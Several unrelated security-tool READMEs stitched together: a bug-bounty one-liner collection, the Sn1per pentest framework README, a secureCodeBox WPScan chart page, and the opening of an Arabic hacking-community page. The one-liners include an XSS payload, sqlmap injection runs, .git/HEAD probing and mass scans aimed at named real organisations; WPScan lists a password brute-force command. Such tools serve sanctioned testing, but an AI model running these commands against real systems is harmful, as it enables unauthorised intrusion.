```bash
shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
```
### Using Chaos to jaeles "How did I find a critical today?.
- [Explained command]
To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates.
```bash
chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
```
### Using shodan to jaeles
- [Explained command]
```bash
domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts
```
### Search to files using assetfinder and ffuf
- [Explained command]
```bash
assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'
```
### HTTPX using new mode location and injection XSS using qsreplace.
- [Explained command]
```bash
httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "'
```
### Grap internal juicy paths and do requests to them.
- [Explained command]
```bash
export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length'
```
### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url.
- [Explained command]
```bash
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
```
### Using to findomain to SQLINJECTION.
- [Explained command]
```bash
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
```
### Jaeles scan to bugbounty targets.
- [Explained command]
```bash
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @
```
### JLDC domain search subdomain, using rush and jaeles.
- [Explained command]
```bash
curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'
```
### Chaos to search subdomains check cloudflareip scan port.
- [Explained command]
```bash
chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent
```
### Search JS to domains file.
- [Explained command]
```bash
cat FILE TO TARGET | httpx -silent | subjs | anew
```
### Search JS using assetfinder, rush and hakrawler.
- [Explained command]
```bash
assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal"
```
### Search to CORS using assetfinder and rush
- [Explained command]
```bash
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"'
```
### Search to js using hakrawler and rush & unew
- [Explained command]
```bash
cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx'
```
### XARGS to dirsearch brute force.
- [Explained command]
```bash
cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js'
```
### Assetfinder to run massdns.
- [Explained command]
```bash
assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent
```
### Extract path to js
- [Explained command]
```bash
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
```
### Find subdomains and Secrets with jsubfinder
- [Explained command]
```bash
cat subdomsains.txt | httpx --silent | jsubfinder search -s
```
### Search domains to Range-IPS.
- [Explained command]
```bash
cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew
```
### Search new's domains using dnsgen.
- [Explained command]
```bash
xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain
```
### List ips, domain extract, using amass + wordlist
- [Explained command]
```bash
amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt
```
### Search domains using amass and search vul to nuclei.
- [Explained command]
```bash
amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30
```
### Verify to cert using openssl.
- [Explained command]
```bash
sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{
N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <(
openssl x509 -noout -text -in <(
openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \
-connect hackerone.com:443 ) )
```
### Search domains using openssl to cert.
- [Explained command]
```bash
xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew
```
### Search to Hackers.
- [Censys](https://censys.io)
- [Spyce](https://spyce.com)
- [Shodan](https://shodan.io)
- [Viz Grey](https://viz.greynoise.io)
- [Zoomeye](https://zoomeye.org)
- [Onyphe](https://onyphe.io)
- [Wigle](https://wigle.net)
- [Intelx](https://intelx.io)
- [Fofa](https://fofa.so)
- [Hunter](https://hunter.io)
- [Zorexeye](https://zorexeye.com)
- [Pulsedive](https://pulsedive.com)
- [Netograph](https://netograph.io)
- [Vigilante](https://vigilante.pw)
- [Pipl](https://pipl.com)
- [Abuse](https://abuse.ch)
- [Cert-sh](https://cert.sh)
- [Maltiverse](https://maltiverse.com/search)
- [Insecam](https://insecam.org)
- [Anubis](https://https://jldc.me/anubis/subdomains/att.com)
- [Dns Dumpster](https://dnsdumpster.com)
- [PhoneBook](https://phonebook.cz)
- [Inquest](https://labs.inquest.net)
- [Scylla](https://scylla.sh)
# Project
[![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org)
[![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/)
[![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/)
[![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty)
<a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
|
[![Sn1perSecurity](https://sn1persecurity.com/images/Sn1perSecurity-Attack-Surface-Management-header2.png)](https://sn1persecurity.com)
[![GitHub release](https://img.shields.io/github/release/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/releases)
[![GitHub issues](https://img.shields.io/github/issues/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/issues)
[![Github Stars](https://img.shields.io/github/stars/1N3/Sn1per.svg?style=social&label=Stars)](https://github.com/1N3/Sn1per/)
[![GitHub Followers](https://img.shields.io/github/followers/1N3.svg?style=social&label=Follow)](https://github.com/1N3/Sn1per/)
[![Tweet](https://img.shields.io/twitter/url/http/xer0dayz.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per)
[![Follow on Twitter](https://img.shields.io/twitter/follow/xer0dayz.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=xer0dayz)
## ABOUT:
Discover the attack surface and prioritize risks with our continuous Attack Surface Management (ASM) platform - Sn1per Professional. For more information, go to https://sn1persecurity.com.
[[Website](https://sn1persecurity.com/wordpress/)] [[Blog](https://sn1persecurity.com/wordpress/blog/)] [[Shop](https://sn1persecurity.com/wordpress/shop)] [[Documentation](https://sn1persecurity.com/wordpress/documentation/)] [[Buy Now](https://sn1persecurity.com/wordpress/product/sn1per-professional-v9-0-elite-bundle/)] [[Find Out More](https://sn1persecurity.com/wordpress/sn1per-professional-v9-0-whats-new/)]
[![](https://sn1persecurity.com/images/Sn1perSecurity-attack-surface-management-header2.png)](https://sn1persecurity.com/)
[![](https://sn1persecurity.com/images/Sn1perSecurity-sn1per3.PNG)](https://sn1persecurity.com/)
## FEATURES:
### Attack Surface Discovery
Easily discover the attack surface (IPs, domain names, open ports, HTTP headers, etc.).
### Penetration Testing
Automate the discovery of vulnerabilities and ethical exploitation using the latest hacking and open source security tools.
### Visual Recon
Perform visual recon against all hosts in your workspace using the Slideshow widget and thumbnails.
### IT Asset Inventory
Search, sort and filter for DNS, IP, title, status, server headers, WAF and open TCP/UDP ports of the entire attack surface inventory.
### Red Team
Strengthen "blue team" response and detection capabilities against automated penetration testing techniques.
### Notepad
Store and access multiple notes in a single location to help manage your data and keep things organized.
### Vulnerability Management
Quickly scan for the latest vulnerabilities and CVEs using the latest commercial and open source vulnerability scanners.
### Web Application Scans
Launch web application scans via Burpsuite Professional 2.x, Arachni and Nikto.
### Reporting
Export the entire attack surface host list and vulnerability reports to CSV, XLS or PDF format to filter, sort and view all attack surface data.
### OSINT Collection
Collect online documents, meta data, email addresses and contact information automatically.
### Continuous Scan Coverage
Schedule scans on a daily, weekly or monthly basis for continuous coverage for changes.
### Bug Bounty
Automate the discovery of the attack surface and scan for the latest vulnerabilities and CVEs easily.
### Notifications & Changes
Receive notifications for scan and host status changes, URL and domain changes and new vulnerabilities discovered.
### Domain Takeovers
List all DNS records vulnerable to domain hijacking and takeover.
## KALI/UBUNTU/DEBIAN/PARROT LINUX INSTALL:
```
git clone https://github.com/1N3/Sn1per
cd Sn1per
bash install.sh
```
## DOCKER INSTALL:
[![](https://sn1persecurity.com/images/docker-logo.png)](https://hub.docker.com/r/sn1persecurity/sn1per)
From a new Docker console, run the following commands.
```
Download https://raw.githubusercontent.com/1N3/Sn1per/master/Dockerfile
docker build -t sn1per .
docker run -it sn1per /bin/bash
or
docker pull xer0dayz/sn1per
docker run -it xer0dayz/sn1per /bin/bash
```
## USAGE:
```
[*] NORMAL MODE
sniper -t <TARGET>
[*] NORMAL MODE + OSINT + RECON
sniper -t <TARGET> -o -re
[*] STEALTH MODE + OSINT + RECON
sniper -t <TARGET> -m stealth -o -re
[*] DISCOVER MODE
sniper -t <CIDR> -m discover -w <WORSPACE_ALIAS>
[*] SCAN ONLY SPECIFIC PORT
sniper -t <TARGET> -m port -p <portnum>
[*] FULLPORTONLY SCAN MODE
sniper -t <TARGET> -fp
[*] WEB MODE - PORT 80 + 443 ONLY!
sniper -t <TARGET> -m web
[*] HTTP WEB PORT MODE
sniper -t <TARGET> -m webporthttp -p <port>
[*] HTTPS WEB PORT MODE
sniper -t <TARGET> -m webporthttps -p <port>
[*] HTTP WEBSCAN MODE
sniper -t <TARGET> -m webscan
[*] ENABLE BRUTEFORCE
sniper -t <TARGET> -b
[*] AIRSTRIKE MODE
sniper -f targets.txt -m airstrike
[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f targets.txt -m nuke -w <WORKSPACE_ALIAS>
[*] MASS PORT SCAN MODE
sniper -f targets.txt -m massportscan
[*] MASS WEB SCAN MODE
sniper -f targets.txt -m massweb
[*] MASS WEBSCAN SCAN MODE
sniper -f targets.txt -m masswebscan
[*] MASS VULN SCAN MODE
sniper -f targets.txt -m massvulnscan
[*] PORT SCAN MODE
sniper -t <TARGET> -m port -p <PORT_NUM>
[*] LIST WORKSPACES
sniper --list
[*] DELETE WORKSPACE
sniper -w <WORKSPACE_ALIAS> -d
[*] DELETE HOST FROM WORKSPACE
sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh
[*] GET SNIPER SCAN STATUS
sniper --status
[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport
[*] LOOT REIMPORTALL FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimportall
[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reload
[*] LOOT EXPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --export
[*] SCHEDULED SCANS
sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly
[*] USE A CUSTOM CONFIG
sniper -c /path/to/sniper.conf -t <TARGET> -w <WORKSPACE_ALIAS>
[*] UPDATE SNIPER
sniper -u|--update
```
## MODES:
* **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
* **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).
* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
* **MASSPORTSCAN:** Runs a "fullportonly" scan on mutiple targets specified via the "-f" switch.
* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
* **MASSWEB:** Runs "web" mode scans on multiple targets specified via the "-f" switch.
* **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.
* **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.
* **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.
* **MASSWEBSCAN:** Runs "webscan" mode scans of multiple targets specified via the "-f" switch.
* **VULNSCAN:** Launches a OpenVAS vulnerability scan.
* **MASSVULNSCAN:** Launches a "vulnscan" mode scans on multiple targets specified via the "-f" switch.
## HELP TOPICS:
- [x] Plugins & Tools (https://github.com/1N3/Sn1per/wiki/Plugins-&-Tools)
- [x] Scheduled scans (https://github.com/1N3/Sn1per/wiki/Scheduled-Scans)
- [x] Sn1per Configuration Options (https://github.com/1N3/Sn1per/wiki/Sn1per-Configuration-Options)
- [x] Sn1per Configuration Templates (https://github.com/1N3/Sn1per/wiki/Sn1per-Configuration-Templates)
- [x] Sc0pe Templates (https://github.com/1N3/Sn1per/wiki/Sc0pe-Templates)
## INTEGRATION GUIDES:
- [x] Github API integration (https://github.com/1N3/Sn1per/wiki/Github-API-Integration)
- [x] Burpsuite Professional 2.x integration (https://github.com/1N3/Sn1per/wiki/Burpsuite-Professional-2.x-Integration)
- [x] OWASP ZAP integration (https://github.com/1N3/Sn1per/wiki/OWASP-ZAP-Integration)
- [x] Shodan API integration (https://github.com/1N3/Sn1per/wiki/Shodan-Integration)
- [x] Censys API integration (https://github.com/1N3/Sn1per/wiki/Censys-API-Integration)
- [x] Hunter.io API integration (https://github.com/1N3/Sn1per/wiki/Hunter.io-API-Integration)
- [x] Metasploit integration (https://github.com/1N3/Sn1per/wiki/Metasploit-Integration)
- [x] Nessus integration (https://github.com/1N3/Sn1per/wiki/Nessus-Integration)
- [x] OpenVAS API integration (https://github.com/1N3/Sn1per/wiki/OpenVAS-Integration)
- [x] Slack API integration (https://github.com/1N3/Sn1per/wiki/Slack-API-Integration)
- [x] WPScan API integration (https://github.com/1N3/Sn1per/wiki/WPScan-API-Integration)
## LICENSE:
This software is free to distribute and use with the condition that credit is provided to the creator (@xer0dayz @Sn1perSecurity), is not renamed and is not for commercial use or resold and rebranded. Permission to distribute any part of the code for sale is strictly prohibited.
## LEGAL DISCLAIMER:
You may not rent or lease, distribute, modify, sell or transfer the software to a third party. Sn1per Community is free for distribution, and modification with the condition that credit is provided to the creator and not used for commercial use. You may not use software for illegal or nefarious purposes. No liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall Sn1perSecurity or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this product, even if Sn1perSecurity has been advised of the possibility of such damages.
## COPYRIGHT:
The software code and logos are owned by Sn1perSecurity and protected by United States copyright and/or patent laws of international treaty provisions. All rights reserved.
## PURCHASE SN1PER PROFESSIONAL:
To obtain a Sn1per Professional license, go to https://sn1persecurity.com.
Attack Surface Management (ASM) | Continuous Attack Surface Testing (CAST) | Attack Surface Software | Attack Surface Platform | Continuous Automated Red Teaming (CART) | Vulnerability & Attack Surface Management | Red Team | Threat Intel | Application Security | Cybersecurity | IT Asset Discovery | Automated Penetration Testing | Hacking Tools | Recon Tool | Bug Bounty Tool | Vulnerability Scanner | Attack Surface Analysis | Attack Surface Reduction | Attack Surface Detector | Attack Surface Monitoring | Attack Surface Review | Attack Surface Discovery | Digital Threat Management | Risk Assessment | Threat Remediation | Offensive Security Framework | Automated Penetration Testing Framework | External Threat Management | Internal IT Asset Discovery | Security Orchestration and Automation (SOAR) | Sn1per tutorial | Sn1per tool | Sn1per metasploit | Sn1per for windows | Sn1per review | Sn1per download | how to use Sn1per | Sn1per professional download | Sn1per professional crack | automated pentesting framework | pentest-tools github | ad pentest tools | pentest-tools review | security testing tools | ubuntu pentesting tools | pentesting tools for mac | cloud-based pen-testing tools
|
---
title: 'WPScan'
category: 'scanner'
type: "CMS"
state: "released"
appVersion: "v3.8.22"
usecase: "Wordpress Vulnerability Scanner"
---
![WPScan Logo](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png)
<!--
SPDX-FileCopyrightText: the secureCodeBox authors
SPDX-License-Identifier: Apache-2.0
-->
<!--
.: IMPORTANT! :.
--------------------------
This file is generated automatically with `helm-docs` based on the following template files:
- ./.helm-docs/templates.gotmpl (general template data for all charts)
- ./chart-folder/.helm-docs.gotmpl (chart specific template data)
Please be aware of that and apply your changes only within those template files instead of this file.
Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml`
--------------------------
-->
<p align="center">
<a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a>
<a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Incubator Project" src="https://img.shields.io/badge/OWASP-Incubator%20Project-365EAA"/></a>
<a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a>
<a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a>
</p>
## What is WPScan?
WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.
> NOTE: You need to provide WPSan with an API Token so that it can look up vulnerabilities infos with [https://wpvulndb.com](https://wpvulndb.com). Without the token WPScan will only identify WordPress Core / Plugin / Theme versions but not if they are actually vulnerable. You can get a free API Token at by registering for an account at [https://wpvulndb.com](https://wpvulndb.com). Using the secureCodeBox WPScans you can specify the token via the `WPVULNDB_API_TOKEN` target attribute, see the example below.
To learn more about the WPScan scanner itself visit [wpscan.org] or [wpscan.io].
## Deployment
The wpscan chart can be deployed via helm:
```bash
# Install HelmChart (use -n to configure another namespace)
helm upgrade --install wpscan secureCodeBox/wpscan
```
## Scanner Configuration
The following security scan configuration example are based on the [WPScan Documentation], please take a look at the original documentation for more configuration examples.
* Scan all plugins with known vulnerabilities: `wpscan --url example.com -e vp --plugins-detection mixed --api-token WPVULNDB_API_TOKEN`
* Scan all plugins in our database (could take a very long time): `wpscan --url example.com -e ap --plugins-detection mixed --api-token WPVULNDB_API_TOKEN`
* Password brute force attack: `wpscan --url example.com -e u --passwords /path/to/password_file.txt`
* WPScan keeps a local database of metadata that is used to output useful information, such as the latest version of a plugin. The local database can be updated with the following command: `wpscan --update`
* When enumerating the WordPress version, installed plugins or installed themes, you can use three different "modes", which are:
* passive
* aggressive
* mixed
If you want the most results use the "mixed" mode. However, if you are worried that the server may not be able to handle many requests, use the "passive" mode. The default mode is "mixed", except plugin enumeration, which is "passive". You will need to manually override the plugin detection mode, if you want to use anything other than the default, with the `--plugins-detection` option.
* WPScan can enumerate various things from a remote WordPress application, such as plugins, themes, usernames, backed up files wp-config.php files, Timthumb files, database exports and more. To use WPScan's enumeration capabilities supply the `-e `option.
```bash
Available Choices:
vp | Vulnerable plugins
ap | All plugins
p | Plugins
vt | Vulnerable themes
at | All themes
t | Themes
tt | Timthumbs
cb | Config backups
dbe | Db exports
u | User IDs range. e.g: u1-5
Range separator to use: '-'
Value if no argument supplied: 1-10
m | Media IDs range. e.g m1-15
Note: Permalink setting must be set to "Plain" for those to be detected
Range separator to use: '-'
Value if no argument supplied: 1-100
Separator to use between the values: ','
Default: All Plugins, Config Backups
Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
Incompatible choices (only one of each group/s can be used):
- vp, ap, p
- vt, at, t
```
## Requirements
Kubernetes: `>=v1.11.0-0`
## Values
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| cascadingRules.enabled | bool | `false` | Enables or disables the installation of the default cascading rules for this scanner |
| parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| parser.image.repository | string | `"docker.io/securecodebox/parser-wpscan"` | Parser image repository |
| parser.image.tag | string | defaults to the charts version | Parser image tag |
| parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. |
| parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
| scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) |
| scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) |
| scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) |
| scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| scanner.image.repository | string | `"wpscanteam/wpscan"` | Container Image to run the scan |
| scanner.image.tag | string | `nil` | defaults to the charts appVersion |
| scanner.nameAppend | string | `nil` | append a string to the default scantype name. |
| scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) |
| scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":false}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated |
| scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. |
| scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode |
| scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system |
| scanner.securityContext.runAsNonRoot | bool | `false` | Enforces that the scanner image is run as a non root user |
| scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
## License
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license].
[scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox
[scb-docs]: https://docs.securecodebox.io/
[scb-site]: https://www.securecodebox.io/
[scb-github]: https://github.com/secureCodeBox/
[scb-twitter]: https://twitter.com/secureCodeBox
[scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU
[scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
[wpscan.io]: https://wpscan.io/
[wpscan.org]: https://wpscan.org/
[WPScan Documentation]: https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation
|
<h2 dir='rtl' align='right'>مجتمع InCyber</h2>
<img align="right" width="300" height="300" src="https://user-images.githubusercontent.com/61029571/88852176-929acd00-d1f6-11ea-9fa3-b517dbc6d40c.png">
<h3 dir='rtl' align='right'>إخلاء المسؤولية</h3>
> <p dir='rtl' align='right'>إن الأدوات والطرق المذكورة هنا هي للتعلّم والإستفادة في مجال اختبار الإختراق أو في مجال اصطياد الثغرات لذلك عليك استخدامها بالشكل الصحيح والقانوني.</p>
<h3 dir='rtl' align='right'>مقدمة</h3>
